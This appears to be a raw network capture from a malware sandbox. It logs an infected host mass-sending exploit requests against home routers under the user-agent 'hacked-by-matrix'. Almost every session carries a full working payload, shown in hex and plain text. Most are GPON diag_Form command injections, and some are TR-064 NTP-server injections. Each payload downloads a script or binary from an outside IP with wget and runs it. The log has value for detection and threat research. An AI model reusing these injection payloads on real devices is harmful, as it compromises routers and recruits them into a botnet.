                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1003192.168.2.1337448212.129.85.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687498093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1004192.168.2.1338706118.35.0.191443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687498093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1005192.168.2.13468905.0.172.160443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687514067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1006192.168.2.13352185.118.254.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687530041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1007192.168.2.135243242.134.64.226443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687539101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1008192.168.2.1349122109.48.201.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687553883 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1009192.168.2.1360546125.149.162.2097547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.821611881 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1010192.168.2.1360016175.238.89.1347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.830837011 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1011192.168.2.134256650.249.149.12580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.067588091 CET313OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:09.202001095 CET902INHTTP/1.0 404 Not Found
                                                        Server: SonicWALL
                                                        Expires: -1
                                                        Cache-Control: no-cache
                                                        Content-type: text/html;charset=UTF-8
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 47 70 6f 6e 46 6f 72 6d 26 23 78 32 46 3b 64 69 61 67 5f 46 6f 72 6d 3f 69 6d 61 67 65 73 26 23 78 32 46 3b 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;GponForm&#x2F;diag_Form?images&#x2F;</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1012192.168.2.1342414173.255.131.10180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.085560083 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:09.227031946 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:09 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
                                                        Mar 21, 2024 05:23:09.227098942 CET1286INData Raw: 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                        Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
                                                        Mar 21, 2024 05:23:09.227200985 CET1286INData Raw: 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                        Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } foote
                                                        Mar 21, 2024 05:23:09.227263927 CET1286INData Raw: 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36
                                                        Data Ascii: float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                        Mar 21, 2024 05:23:09.227349043 CET1286INData Raw: 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66
                                                        Data Ascii: kl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt
                                                        Mar 21, 2024 05:23:09.227494955 CET1286INData Raw: 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52
                                                        Data Ascii: 2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5K
                                                        Mar 21, 2024 05:23:09.227572918 CET1122INData Raw: 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30
                                                        Data Ascii: IwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g
                                                        Mar 21, 2024 05:23:09.227823973 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to slmp-550-68.slc.westdc.net's <a href="mailto:cpane
                                                        Mar 21, 2024 05:23:09.227955103 CET375INData Raw: 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61
                                                        Data Ascii: elwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyri


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1013192.168.2.1359416136.0.145.580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.221558094 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
